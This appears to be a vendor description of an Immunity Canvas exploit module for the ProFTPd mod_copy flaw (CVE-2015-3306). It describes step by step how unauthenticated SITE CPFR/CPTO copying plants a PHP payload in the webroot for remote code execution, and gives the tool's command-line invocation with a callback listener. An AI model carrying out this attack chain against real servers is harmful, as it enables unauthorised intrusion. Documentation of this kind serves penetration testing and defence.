Immunity Canvas: PROFTPD_MOD_COPY

This exploit abuses the commands of the mod_copy module in ProFTPd (version<=1.3.5). The SITE CPFR/CPTO commands can be used by unauthenticated clients to copy files from any part of the filesistem to a chosen destination. With these commands the mod_copy module allows remote attackers to read and write local files.
In the first part of the attack, the exploit copy the /proc/self/cmdline to /tmp/ folder with a PHP payload as the filename, then copy this file to the webroot as a PHP file.
The second part of the attack involves making a GET request to the PHP file just created with the PHP shellcode as a parameter. The payload created in the first part will execute the PHP
shellcode

Note about the target:
To exploit this vulnerability, the mod_copy module must be compiled with the ProFTPd’s sources.Also we need write privs on the webroot folder we choose (unless the ftp server was started has root).
Then we must assume that the webserver has a PHP module.

This exploit has been tested on:

• Ubuntu 13.04 - Linux 3.8.0-19-generic x64. (Successful exploitation)

Command line usage:
$ ./commandlineInterface.py -l 172.16.135.238 -p5556 -v 7
$ python ./exploits/remote/unix/proftpd_mod_copy/proftpd_mod_copy.py -t 172.16.135.238 -l 172.16.135.1 -d 5556

Repeatability: Infinite
References: http://bugs.proftpd.org/show_bug.cgi?id=4169
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306
CERT Advisory: None
Date Public: 05/18/2015
CVSS: 10